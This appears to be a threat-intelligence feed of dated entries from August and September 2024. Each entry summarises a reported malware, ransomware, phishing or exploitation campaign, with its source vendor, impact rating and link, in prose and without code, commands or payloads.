Mandiant researchers have investigated and uncovered a sophisticated social engineering tactic used by DPRK threat actors to compromise systems. The attackers use fake job recruitment scenarios to deliver malware. In one case, an engineer received a ZIP file disguised as a Python coding challenge, which contained the COVERTCATCH malware. It infected a macOS system and deployed additional malicious software via Launch Agents and Launch Daemons. Similarly, finance personnel are targeted with a fake job offer for a high-profile position that includes a malicious PDF. The PDF installed RUSTBUCKET, a Rust-based backdoor that collects system information and communicates with a command-and-control server, persisting through a disguised Launch Agent.
Source: https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/
2024-09-04
Technical_Analysis_of_AZORult_Malware
LOW
Intel Source:
ANY.RUN
Intel Name:
Technical_Analysis_of_AZORult_Malware
Date of Scan:
2024-09-04
Impact:
LOW
Summary:
AZORult is a sophisticated malware designed to steal credentials and payment card information, and it can also function as a downloader for various other malware families. Version 2 of AZORult added support for .bit domains, enhancing its capabilities. It has been seen operating alongside Chthonic and being deployed by the Ramnit malware family. Initially developed in Delphi, the malware was ported to C++ in 2019, reflecting its increased complexity and evolution over time.
Source: https://any.run/cybersecurity-blog/azorult-malware-analysis/
2024-09-04
Babylon_RAT_Campaign
LOW
Intel Source:
Cyble
Intel Name:
Babylon_RAT_Campaign
Date of Scan:
2024-09-04
Impact:
LOW
Summary:
Cyble researchers have discovered a cyber-attack targeting political figures and government officials in Malaysia. The attack has been active since July, and the attackers deploy multiple malicious ISO files to compromise Malaysian entities. These files contain various malicious components, such as a shortcut (LNK) file, a hidden PowerShell script, a malicious executable and a decoy PDF. Their primary objective is to deliver Babylon RAT, an open-source RAT that gives the attackers remote control over the compromised system and access to sensitive data. The RAT also makes changes to the system to ensure it remains active even after the computer restarts.
Source: https://cyble.com/blog/the-intricate-babylon-rat-campaign-targets-malaysian-politicians-government/
2024-09-03
MacroPack_Exploited_in_Global_Malware_Campaign
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
MacroPack_Exploited_in_Global_Malware_Campaign
Date of Scan:
2024-09-03
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have discovered that attackers are misusing a tool called MacroPack, which is normally used for security testing, to distribute malicious software. Between May and July 2024, they found many malicious Microsoft Office documents uploaded to VirusTotal from countries including China, Pakistan, Russia and the United States. These documents were used to distribute malicious software such as Havoc and Brute Ratel, as well as a new version of the PhantomCore remote access trojan (RAT).
Source: https://blog.talosintelligence.com/threat-actors-using-macropack/
2024-09-03
Cicada3301_Ransomware
MEDIUM
Intel Source:
Truesec
Intel Name:
Cicada3301_Ransomware
Date of Scan:
2024-09-03
Impact:
MEDIUM
Summary:
Truesec researchers have identified that the Cicada3301 group, a ransomware-as-a-service provider, launched its platform on June 29, 2024, following its first data leak on June 25. The ransomware, written in Rust, targets both Windows and Linux/ESXi systems.
Source: https://www.truesec.com/hub/blog/dissecting-the-cicada
2024-09-03
Luxy_A_Stealer_and_A_Ransomware
LOW
Intel Source:
K7 Security Labs
Intel Name:
Luxy_A_Stealer_and_A_Ransomware
Date of Scan:
2024-09-03
Impact:
LOW
Summary:
K7 researchers have discovered a malware called Luxy that has both data-stealing and ransomware capabilities. Luxy tries to steal passwords, browser details and cryptocurrency wallet information from the victim's computer, similar to another malware called Umbral Stealer. It operates in multiple stages, such as blocking access to certain websites, stealing sensitive data and encrypting files on the victim's computer, then demanding a ransom to unlock the files.
Source: https://labs.k7computing.com/index.php/luxy-a-stealer-and-a-ransomware-in-one/
2024-09-03
Global_Phishing_Scam_Targets_Canadian_Pizza_Chains
LOW
Intel Source:
Bfore AI
Intel Name:
Global_Phishing_Scam_Targets_Canadian_Pizza_Chains
Date of Scan:
2024-09-03
Impact:
LOW
Summary:
Researchers at BforeAI have uncovered a phishing campaign targeting well-known international pizza chains that leads to financial losses for customers. The campaign began in Singapore, where attackers created fake Domino's Pizza websites like domino-plza[.]com to scam customers. The attackers also use paid search engine ads to ensure their fake websites appear at the top of search results, making it easier to trick people. After Singapore, the same group targeted Canadian pizza chains such as PizzaPizza, Little Caesars Pizza, Blaze Pizza, 241 Pizza, Panago Pizza and Boston Pizza. They create fake domains that mimic legitimate ones to trick customers into providing card details, which the scammers then use for unauthorized transactions, a practice known as carding.
Source: https://bfore.ai/international-pizza-chain-domain-spoofing-report/
2024-09-03
Unmasking_Vidar_Malware_Via_PEC_Emails
LOW
Intel Source:
CERT-AGID
Intel Name:
Unmasking_Vidar_Malware_Via_PEC_Emails
Date of Scan:
2024-09-03
Impact:
LOW
Summary:
Researchers from CERT-AgID have detected a third malicious campaign in less than a month, this time distributing Vidar malware via compromised PEC emails. These fake emails present a fraudulent unpaid invoice and threaten legal action to lure recipients into clicking a link that downloads malicious JavaScript code. This file then triggers the download of further malicious scripts.
Source: https://cert-agid.gov.it/news/vidar-insiste-in-italia-con-campagne-via-pec/
2024-09-03
Latrodectus_Malware_Disguised_as_AhnLab_Software
LOW
Intel Source:
Hunt.IO
Intel Name:
Latrodectus_Malware_Disguised_as_AhnLab_Software
Date of Scan:
2024-09-03
Impact:
LOW
Summary:
Hunt.IO researchers have uncovered a C2 server associated with Latrodectus malware that communicates with a malicious file named MeDExt.dll, which functions as a downloader. This malware operates as a backdoor, allowing attackers to execute remote commands, gather information from compromised systems and deploy additional payloads, including Brute Ratel C4. The MeDExt.dll file mimics a legitimate file from AhnLab security software to bypass security controls; this suggests the attacker either targets victims using AhnLab products or bundled the legitimate software with the malware.
Source: https://hunt.io/blog/latrodectus-malware-masquerades-as-ahnlab-security-software-to-infect-victims
2024-09-03
Emansrepo_Stealer
LOW
Intel Source:
Fortinet
Intel Name:
Emansrepo_Stealer
Date of Scan:
2024-09-03
Impact:
LOW
Summary:
Researchers at FortiGuard have identified a new Python-based infostealer called Emansrepo that is distributed through phishing emails containing fake purchase orders and invoices. This infostealer has been active since November 2023 and steals sensitive information from victims by compressing data from their browsers and specific file locations into a ZIP file and then sending it to the attacker via email. The malware is packaged so that it can run on a computer even if Python is not installed.
Source: https://www.fortinet.com/blog/threat-research/emansrepo-stealer-multi-vector-attack-chains
2024-09-03
Ransomware_Gangs_Supported_by_Iranian_Hackers
MEDIUM
Intel Source:
Cyble
Intel Name:
Ransomware_Gangs_Supported_by_Iranian_Hackers
Date of Scan:
2024-09-03
Impact:
MEDIUM
Summary:
Researchers from Cyble have discovered that Iranian state-sponsored hacking groups, including "Pioneer Kitten" and "Lemon Sandstorm," are increasingly targeting critical infrastructure sectors in the United States and its allies, such as education, finance, healthcare and defense. These groups have evolved into access brokers for ransomware gangs, selling access to compromised networks while also conducting espionage for the Iranian government.
Source: https://cyble.com/blog/iranian-state-sponsored-hackers-have-become-access-brokers-for-ransomware-gangsca/
2024-09-03
Potential_C2_Seeder_Queries_09022024
MEDIUM
Intel Source:
STR
Intel Name:
Potential_C2_Seeder_Queries_09022024
Date of Scan:
2024-09-03
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: https://github.com/str-int-repo/str-seeder-behavior-queries
2024-09-02
Malicious_NPM_Packages_Target_Roblox_Users
LOW
Intel Source:
Checkmarx
Intel Name:
Malicious_NPM_Packages_Target_Roblox_Users
Date of Scan:
2024-09-02
Impact:
LOW
Summary:
Researchers at Checkmarx have identified a malware campaign targeting Roblox developers through the distribution of infected NPM packages claiming to be the popular ‘noblox.js’ library. Such packages are built to harvest data and compromise systems, and they rely on the openness of the open-source model for distribution. The Roblox platform, with its massive user base of over 70 million daily users, has been a primary target.
Source: https://checkmarx.com/blog/year-long-campaign-of-malicious-npm-packages-targeting-roblox-users/
2024-09-02
Emerging_Threats_in_New_TLDs
LOW
Intel Source:
Palo Alto
Intel Name:
Emerging_Threats_in_New_TLDs
Date of Scan:
2024-09-02
Impact:
LOW
Summary:
Researchers from Palo Alto Networks have observed newly released top-level domains and found that attackers are exploiting them for phishing, spreading unwanted programs and other malicious activities. These attackers watch for new TLDs to exploit, particularly those that resemble common file extensions, such as .zip.
Source: https://unit42.paloaltonetworks.com/tracking-newly-released-top-level-domains/
2024-09-02
PowerShell_Keylogger
LOW
Intel Source:
Cyfirma
Intel Name:
PowerShell_Keylogger
Date of Scan:
2024-09-02
Impact:
LOW
Summary:
Researchers at Cyfirma have identified a new keylogger that runs as a PowerShell script and captures every keystroke on a compromised machine, including passwords and credit card details. It operates using advanced techniques without direct user interaction and collects files and directories, system information and cryptographic settings. The keylogger also captures screenshots and communicates with the attacker through a cloud server in Finland acting as a proxy and the Tor network, so that the attacker remains undetected.
Source: https://www.cyfirma.com/research/cyfirma-research-powershell-keylogger/
2024-09-02
SEO_Poisoned_WikiLoader_Targets_VPN_Users
MEDIUM
Intel Source:
PaloAlto
Intel Name:
SEO_Poisoned_WikiLoader_Targets_VPN_Users
Date of Scan:
2024-09-02
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have found a new variant of the WikiLoader malware, which is being distributed through SEO poisoning and impersonates Palo Alto Networks' GlobalProtect VPN software. The Advanced WildFire reverse engineering team completed an investigation, discovering the most recent evasion techniques used by WikiLoader and providing new insights into its evolution.
Source: https://unit42.paloaltonetworks.com/global-protect-vpn-spoof-distributes-wikiloader/
2024-09-02
Head_Mare_Targeting_Russian_Firms_with_Ransomware
MEDIUM
Intel Source:
Securelist
Intel Name:
Head_Mare_Targeting_Russian_Firms_with_Ransomware
Date of Scan:
2024-09-02
Impact:
MEDIUM
Summary:
Head Mare is a hacktivist group that emerged in 2023 and gained attention on X (formerly Twitter) by publishing information about its victims, including organizational details and stolen internal documents. The group focuses exclusively on Russian and Belarusian companies, using phishing campaigns to distribute RAR archives that exploit the CVE-2023-38831 vulnerability in WinRAR. Its attacks rely on tools associated with other groups, and it uses LockBit ransomware for Windows and Babuk ransomware for Linux (ESXi) systems.
Source: https://securelist.com/head-mare-hacktivists/113555/
2024-09-02
Stone_Wolf_Employs_Meduza_Stealer
LOW
Intel Source:
BI Zone
Intel Name:
Stone_Wolf_Employs_Meduza_Stealer
Date of Scan:
2024-09-02
Impact:
LOW
Summary:
BI.ZONE researchers have uncovered a phishing campaign by the group Stone Wolf, which sends emails that appear to come from a legitimate industrial automation provider. The attackers use brand logos and visual identities to make their emails seem legitimate, aiming to deliver Meduza Stealer. They distribute a malicious archive that, when opened, downloads and executes a file from a remote server. Once installed, the malware steals sensitive information, including browser, email and crypto wallet credentials, as well as system details like device name, time zone and public IP address. If the malware cannot connect to its command server, it terminates.
Source: https://bi.zone/eng/expertise/blog/stone-wolf-atakuet-rossiyskie-kompanii-stilerom-meduza/
2024-09-02
Abyss_Ransomware
MEDIUM
Intel Source:
SOC Radar
Intel Name:
Abyss_Ransomware
Date of Scan:
2024-09-02
Impact:
MEDIUM
Summary:
SOCRadar researchers have profiled a group called Abyss Ransomware, also known as Abyss Locker, which appeared in 2023. This group mainly targets sectors such as finance, manufacturing, healthcare and IT. Initially it focused on Windows systems but later expanded to Linux environments, especially VMware ESXi virtualized platforms. The group gains access to its targets through phishing emails, weak SSH configurations or by exploiting known server vulnerabilities, and it uses brute-force attacks on SSH in Linux environments. Abyss Ransomware mainly targets the U.S. but also affects other countries such as the UK, Canada, Germany and Hong Kong.
Source: https://socradar.io/dark-web-profile-abyss-ransomware/
2024-08-30
Deepfake_Scam_Campaign
LOW
Intel Source:
Palo Alto
Intel Name:
Deepfake_Scam_Campaign
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
Palo Alto researchers have discovered various scam campaigns using deepfake videos of well-known public figures such as CEOs, news anchors and government officials. These campaigns appear in English, Spanish, French, Italian, Turkish, Czech and Russian and target people in countries including Canada, Mexico, France, Italy, Turkey, Czechia, Singapore, Kazakhstan and Uzbekistan. The scams usually promote fake investment opportunities or government giveaways. One example is the Quantum AI scam, which uses deepfake videos of figures such as Elon Musk to promote a fake investment platform. These campaigns typically trick people into providing personal information on scam websites and then try to steal their money.
Source: https://unit42.paloaltonetworks.com/dynamics-of-deepfake-scams/
2024-08-30
An_Overview_of_Undergroud_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
An_Overview_of_Undergroud_Ransomware
Date of Scan:
2024-08-30
Impact:
MEDIUM
Summary:
Researchers at Fortinet have profiled a group called Underground Ransomware that first emerged in July 2023. This ransomware targets Windows machines and demands a ransom for decryption through ransom notes. The Russia-based RomCom group, also known as Storm-0978, is believed to be behind this ransomware. The group is known for exploiting vulnerabilities, using phishing emails and buying access from other hackers to spread the ransomware. The Underground group maintains a data leak site where it posts information about its victims and has published data stolen from 16 victims. It also operates a Telegram channel called Underground Team.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-underground
2024-08-30
Mekotio_Trojan
LOW
Intel Source:
Cyfirma
Intel Name:
Mekotio_Trojan
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
Cyfirma researchers have analyzed a malware named Mekotio Trojan, which uses PowerShell to spread and execute its payload on compromised machines. The malware is difficult to detect because it uses custom XOR decryption techniques to hide its activities. It gathers information about the system, connects to a remote server to receive further instructions and ensures that its malicious files remain active so it can continuously carry out its tasks.
Source: https://www.cyfirma.com/research/analyzing-the-mekotio-trojan/
2024-08-30
AsyncRAT_and_Infostealer_Spread_Via_Phishing_Emails
LOW
Intel Source:
Esentire
Intel Name:
AsyncRAT_and_Infostealer_Spread_Via_Phishing_Emails
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
eSentire researchers have discovered an attack involving AsyncRAT malware that was delivered through a phishing email carrying a malicious file. The file appears as a legitimate document named Summary Form; it contains an HTML character and retrieves a VBScript that downloads a file disguised as an image. These scripts download additional malicious scripts that set up a scheduled task to install AsyncRAT, including an infostealer plugin that targets popular web browsers such as Chrome, Firefox and Edge to steal sensitive information.
Source: https://www.esentire.com/blog/exploring-asyncrat-and-infostealer-plugin-delivery-through-phishing-emails
2024-08-30
Weaponized_Digital_Analytics_Tools
LOW
Intel Source:
Google Mandiant
Intel Name:
Weaponized_Digital_Analytics_Tools
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
Mandiant highlights the ways attackers repurpose digital analytics platforms such as link shorteners, IP geolocation utilities and CAPTCHA tools to evade detection and enhance their malicious campaigns. By using these tools, attackers can obscure URLs, track the spread of infections, tailor attacks to specific regions and block automated threat analysis, ultimately making their operations more effective.
Source: https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/
2024-08-30
Citrine_Sleet_exploiting_Chromium_zero_day
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Citrine_Sleet_exploiting_Chromium_zero_day
Date of Scan:
2024-08-30
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered a vulnerability known as CVE-2024-7971 in Chromium browsers which was being exploited by a North Korean threat actor called Citrine Sleet to gain remote code execution. This group primarily targets organizations in the cryptocurrency sector for financial gain. Exploiting this vulnerability could allow attackers to run malicious code within the Chromium browser engine, which underlies popular browsers like Google Chrome, meaning they can run their own code on the victim’s device without permission.
Source: https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/
2024-08-30
Godzilla_Backdoors_Hit_Atlassian_Confluence
LOW
+
Intel Source:
Trend Micro
Intel Name:
Godzilla_Backdoors_Hit_Atlassian_Confluence
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered a new attack vector that exploits CVE-2023-22527 in Atlassian Confluence. This exploit uses the Godzilla webshell, an advanced fileless backdoor that employs AES encryption and avoids detection by remaining in memory. This highlights the importance of regular patching and stronger security protocols.
Source: https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html
2024-08-30
Analysis_of_Beast_Ransomware
LOW
+
Intel Source:
Linkedin
Intel Name:
Analysis_of_Beast_Ransomware
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
Beast Ransomware came into existence in May 2024, a situation very different from the one that existed in October 2023, and it appends the .BEAST extension to encrypted files. Unlike most other ransomware groups, Beast has not yet (but most likely will very soon) put out a data leak site (DLS) on the Dark Web. It could be traced to the LockBit Ransomware Builder, as some of the traitor samples are in the Black LockBit category. The LockBit builder was exposed in September 2022.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_ransomware-beast-infosec-activity-7234810048307154945-rsBj/?utm_source=share&utm_medium=member_ios
2024-08-30
Voldemort_Targets_with_Novel_Tactics
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Voldemort_Targets_with_Novel_Tactics
Date of Scan:
2024-08-30
Impact:
MEDIUM
Summary:
Proofpoint researchers have identified a sophisticated cyberattack campaign deploying custom malware named Voldemort. The attack chain consists of several techniques that are currently common in the threat environment in addition to unusual command and control (C2) methods such as using Google Sheets. It is noteworthy for its use of tactics, techniques, and procedures (TTPs), luring themes that pose as foreign government agencies, odd file names, and passwords such as "test."
Source: https://www.proofpoint.com/us/blog/threat-insight/malware-must-not-be-named-suspected-espionage-campaign-delivers-voldemort
2024-08-30
Corona_Mirai_Botnet
LOW
+
Intel Source:
Akamai
Intel Name:
Corona_Mirai_Botnet
Date of Scan:
2024-08-30
Impact:
LOW
Summary:
Akamai researchers have uncovered a botnet campaign exploiting a zero-day vulnerability (CVE-2024-7029) in the brightness function of AVTECH CCTV cameras that allows remote code execution. Once the vulnerability is exploited, the botnet spreads a variant of the Mirai malware known as Corona Mirai, which can be executed with privileged access. The botnet is also exploiting several older vulnerabilities, including those in Huawei devices and Hadoop YARN, taking advantage of unpatched security flaws that attackers often target.
Source: https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt
2024-08-30
Latrodectus_Rapid_Evolution
MEDIUM
+
Intel Source:
Netskope
Intel Name:
Latrodectus_Rapid_Evolution
Date of Scan:
2024-08-30
Impact:
MEDIUM
Summary:
Latrodectus, a malware downloader initially discovered in 2023, shares similarities with IcedID and has evolved rapidly. Delivered primarily via spam campaigns by TA577 and TA578, it downloads and executes additional payloads, collects system info, and more. The latest version, 1.4, includes updates such as enhanced string obfuscation with AES256 encryption, a new command-and-control (C2) endpoint, and two new backdoor commands for executing shellcode and downloading files.
Source: https://www.netskope.com/blog/latrodectus-rapid-evolution-continues-with-latest-new-payload-features
2024-08-29
Iranian_Counterintelligence_Operation
LOW
+
Intel Source:
Mandiant, Google Cloud Blog
Intel Name:
Iranian_Counterintelligence_Operation
Date of Scan:
2024-08-29
Impact:
LOW
Summary:
Mandiant researchers have discovered an Iranian counterintelligence campaign targeting Farsi-speaking individuals using fake recruitment websites impersonating Israel-based human resources organizations. The effort aimed to collect personal information in order to identify Iranians who collaborated with foreign intelligence, mainly Israel. The operation, which is possibly linked to APT42, lasted from 2017 to March 2024. Mandiant stopped the activity by terminating the threat actor's accounts.
Source: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation
2024-08-29
SLOWTEMPEST_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
SLOWTEMPEST_Campaign
Date of Scan:
2024-08-29
Impact:
MEDIUM
Summary:
Securonix researchers have uncovered a covert cyberattack campaign called SLOW#TEMPEST that targets Chinese-speaking users. The attackers send a phishing email with ZIP files to deliver Cobalt Strike. These password-protected ZIP files contain a Word document, and when a user opens it, the malicious code is triggered. The campaign specifically targets users in China, because the Chinese language is used in file names and the C2 servers are hosted by a Chinese company, Shenzhen Tencent. The attackers spread through the network using RDP and other tools to find open ports and gather information. They also use a tool called Mimikatz to extract Windows passwords and log into systems remotely to avoid detection.
Source: https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/
2024-08-29
Fake_Political_Sites_Exploit_US_Election
LOW
+
Intel Source:
Hyas
Intel Name:
Fake_Political_Sites_Exploit_US_Election
Date of Scan:
2024-08-29
Impact:
LOW
Summary:
Researchers from Hyas have revealed that attackers are using fake domains, such as actsblue[.]com, to mimic legitimate political donation sites during the US election, making it difficult to trace the attackers due to their use of anonymous registration services.
Source: https://www.hyas.com/blog/special-bulletin-us-election-phishing-alert
2024-08-29
RansomHub_Ransomware_Updates
MEDIUM
+
Intel Source:
CISA
Intel Name:
RansomHub_Ransomware_Updates
Date of Scan:
2024-08-29
Impact:
MEDIUM
Summary:
A joint advisory has been issued by the FBI, CISA, MS-ISAC and HHS about a ransomware group called RansomHub, formerly known as Cyclops and Knight. This group has been active since February 2024 and operates as a ransomware-as-a-service that provides tools to its affiliates to carry out attacks. The group has targeted 210 victims across various sectors including IT, government services, financial services, healthcare, food and agriculture, and critical manufacturing. RansomHub uses a double-extortion tactic: it encrypts the victim’s data, demands a ransom, and directs the victim to make contact through a special [.]onion website on the dark web. Victims are given limited time to pay the ransom before their data is published online.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a
2024-08-29
Fake_Palo_Alto_Tool_Targets_Middle_East_Users
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Fake_Palo_Alto_Tool_Targets_Middle_East_Users
Date of Scan:
2024-08-29
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have identified that threat actors are targeting people in the Middle East using malware disguised as the Palo Alto GlobalProtect tool. This malware uses a two-step infection process, infecting with a setup.exe file and communicating with the Interactsh project. It is capable of running remote PowerShell commands, exfiltrating files, encrypting communications, and bypassing sandbox solutions, representing a significant threat to targeted organizations.
Source: https://www.trendmicro.com/en_us/research/24/h/threat-actors-target-middle-east-using-fake-tool.html
2024-08-29
New_Analysis_and_Insights_of_LummaC2
LOW
+
Intel Source:
Ontinue
Intel Name:
New_Analysis_and_Insights_of_LummaC2
Date of Scan:
2024-08-29
Impact:
LOW
Summary:
Ontinue researchers have revealed an increase in activity involving the LummaC2 infostealer. This analysis explores another variant of LummaC2, which was first observed as a series of PowerShell commands and ended with the successful installation of the malware. The analysis details the various stages of the malware operation, from the initial PowerShell command to the decryption and execution of the payload, offering insights into the attackers' tactics, techniques, and procedures (TTPs).
Source: https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/
2024-08-29
State_Hackers_and_Vendors_Reusing_Exploits
LOW
+
Intel Source:
Google TAG
Intel Name:
State_Hackers_and_Vendors_Reusing_Exploits
Date of Scan:
2024-08-29
Impact:
LOW
Summary:
Google's Threat Analysis Group (TAG) uncovered multiple exploit campaigns targeting Mongolian government websites from November 2023 to July 2024. These attacks, attributed to the Russian-backed APT29 group, used n-day exploits to compromise iOS and Android devices via watering hole techniques. Notably, the attackers employed exploits previously used by commercial surveillance vendors Intellexa and NSO Group, raising concerns about the crossover between state-backed and commercial exploitation. Despite the vulnerabilities being patched, the attacks continued to affect unpatched devices.
Source: https://blog.google/threat-analysis-group/state-backed-attackers-and-commercial-surveillance-vendors-repeatedly-use-the-same-exploits/
2024-08-29
Malicious_NPM_Packages_Linked_to_North_Korea
LOW
+
Intel Source:
Phylum
Intel Name:
Malicious_NPM_Packages_Linked_to_North_Korea
Date of Scan:
2024-08-29
Impact:
LOW
Summary:
Researchers at Phylum have detected a recent increase in malicious activity associated with North Korean threat actors within the npm ecosystem. This uptick, observed starting August 12, 2024, began with the release of the `temp-etherscan-api` package and two versions of `etherscan-api`. About a week and a half later, the `telegram-con` package and another version of `etherscan-api` were published. The surge appears to involve multiple groups or demonstrates various publication patterns, tactics, techniques, and procedures (TTPs), and attack methods that have been previously seen.
Source: https://blog.phylum.io/north-korea-still-attacking-developers-via-npm/
2024-08-28
Peach_Sandstorm
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Peach_Sandstorm
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
Between April and July 2024, Microsoft observed Iranian state-sponsored group Peach Sandstorm deploying custom malware, named Tickler, in intelligence-gathering operations targeting U.S. and UAE sectors like satellite, communications, oil and gas, and government. The group, linked to the Iranian Islamic Revolutionary Guard Corps (IRGC), continued to employ password spray attacks, primarily targeting defense and government organizations for intelligence collection. Additionally, Peach Sandstorm utilized fraudulent Azure infrastructure for command-and-control operations and leveraged social engineering through LinkedIn to gather intelligence.
Source: https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/
2024-08-28
RobotDropper
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
RobotDropper
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
A new low-detection MSI dropper named "RobotDropper" has been discovered, which delivers malware such as Lumma and Stealc. This dropper uses a password-protected RAR archive and has a very low detection rate on VirusTotal. It communicates with multiple domains, requesting users to confirm they're human before sending data.
Source: https://x.com/anyrun_app/status/1828798277828890788
2024-08-28
Hidden_Attacks_Targeting_US_Organizations
LOW
+
Intel Source:
GRIT
Intel Name:
Hidden_Attacks_Targeting_US_Organizations
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Researchers from the GuidePoint Research and Intelligence Team (GRIT) have discovered a campaign targeting over 130 US-based companies from various industries. The attackers target specific individuals within these organizations and use social engineering techniques to acquire their login information and one-time passcodes. This is difficult to detect since the attackers frequently communicate through direct phone calls or text messages, bypassing typical security measures. If users fail to report unusual calls or messages, security teams may be unaware that an attack is taking place. The attackers keep trying new users until they find one who falls for the fraud.
Source: https://www.guidepointsecurity.com/blog/so-phish-ticated-attacks/
2024-08-28
Operation_Oxidovy
LOW
+
Intel Source:
Seqrite
Intel Name:
Operation_Oxidovy
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Seqrite researchers have discovered a malware campaign targeting government and military officials in the Czech Republic using deceptive tactics related to the relationship between NATO and the Czech Republic. The attackers employed a sophisticated malware system which includes a Rust-based loader called Freeze and a C2 framework known as HavocC2. The campaign involved two decoy documents: one with instructions for changing passwords on the Ministry of Defense internal network and another discussing the Czech Republic's relationship with NATO.
Source: https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/
2024-08-28
Scammers_Exploit_Zoom_to_Distribute_ScreenConnect
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Scammers_Exploit_Zoom_to_Distribute_ScreenConnect
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
Researchers from Cyble have noticed that scammers are using a fake Zoom webpage to deceive people into downloading ScreenConnect software. This software allows them to remotely manipulate the victims' machines. The scammers are also responsible for other scams aimed at Social Security Administration (SSA) account holders, utilizing spam emails that falsely appear to be from SSA support.
Source: https://cyble.com/blog/scammers-use-screenconnect-to-defraud-ssa-beneficiaries/
2024-08-28
Phishers_Leverage_Microsoft_Sway_for_Scams
LOW
+
Intel Source:
NetSkope
Intel Name:
Phishers_Leverage_Microsoft_Sway_for_Scams
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Netskope researchers have recently discovered that attackers are misusing the Microsoft Sway presentation application, offered free inside Microsoft 365, for phishing. Attackers take advantage of this legitimate cloud application because it lends them credibility, since the victims are already logged in to Microsoft 365. The ability to share the content or embed it in web pages makes it effective for phishing attempts.
Source: https://www.netskope.com/blog/phishing-in-style-microsoft-sway-abused-to-deliver-quishing-attacks
2024-08-28
Mallox_Ransomware_Attack_Details
MEDIUM
+
Intel Source:
Trustwave
Intel Name:
Mallox_Ransomware_Attack_Details
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
A recent investigation by Trustwave uncovered that unauthorized access to a client's internal cloud environment led to a Mallox ransomware attack. Mallox, also known as FARGO, initially targeted Microsoft SQL servers but has since evolved to affect Linux systems and VMware ESXi environments. Since first appearing as Ransomware-as-a-Service in mid-2023, Mallox has targeted different industries including IT and government, and has followed a double extortion model.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/exposed-and-encrypted-inside-a-mallox-ransomware-attack/
2024-08-28
Iranian_Threat_Actor_target_US_Entities
MEDIUM
+
Intel Source:
CISA
Intel Name:
Iranian_Threat_Actor_target_US_Entities
Date of Scan:
2024-08-28
Impact:
MEDIUM
Summary:
A joint advisory has been issued by the FBI, CISA, and DC3 stating that Iranian threat actors continue to target organizations in the U.S. and other countries such as Israel, Azerbaijan and the UAE. These actors primarily focus on gaining access to networks in various sectors including education, finance, healthcare, defense and government bodies in the U.S. so that they can collaborate with ransomware groups to deploy ransomware. The FBI believes these hackers are connected to the government of Iran and are engaged in activities to steal sensitive information, especially from organizations in Israel and Azerbaijan.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
2024-08-28
Similarities_Between_BlackJack_and_Twelve
LOW
+
Intel Source:
Securelist
Intel Name:
Similarities_Between_BlackJack_and_Twelve
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Researchers at Securelist have identified that the Blackjack and Twelve hacktivist groups use the same tactics and tools. Blackjack emerged in late 2023 and targets Russian organisations and government agencies. This group uses various open-source tools such as the SSH client PuTTY, Shamoon, ngrok and AnyDesk. Similarly, another hacktivist group called Twelve also relies on publicly available tools and doesn’t develop its own. Both groups are not interested in financial gain but aim to damage target organizations by encrypting, deleting, and stealing data and resources.
Source: https://securelist.ru/blackjack-hacktivists-connection-with-twelve/110326/
2024-08-28
Persistent_Attack_on_Vietnamese_Human_Rights_NGO
LOW
+
Intel Source:
Huntress
Intel Name:
Persistent_Attack_on_Vietnamese_Human_Rights_NGO
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
Researchers from Huntress have identified a complicated cyber attack targeting a non-profit group dedicated to Vietnamese human rights. This attack may have been ongoing for almost four years. Researchers first spotted strange behavior, which prompted a more thorough analysis, revealing the hidden ways the attacker remained within the system and the activities they conducted. Huntress Managed EDR played an important role in this process, assisting the team in detecting and removing the attacker's presence across several platforms.
Source: https://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders
2024-08-28
Python_Popularity_in_Windows_Attacks_Explained
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_Popularity_in_Windows_Attacks_Explained
Date of Scan:
2024-08-28
Impact:
LOW
Summary:
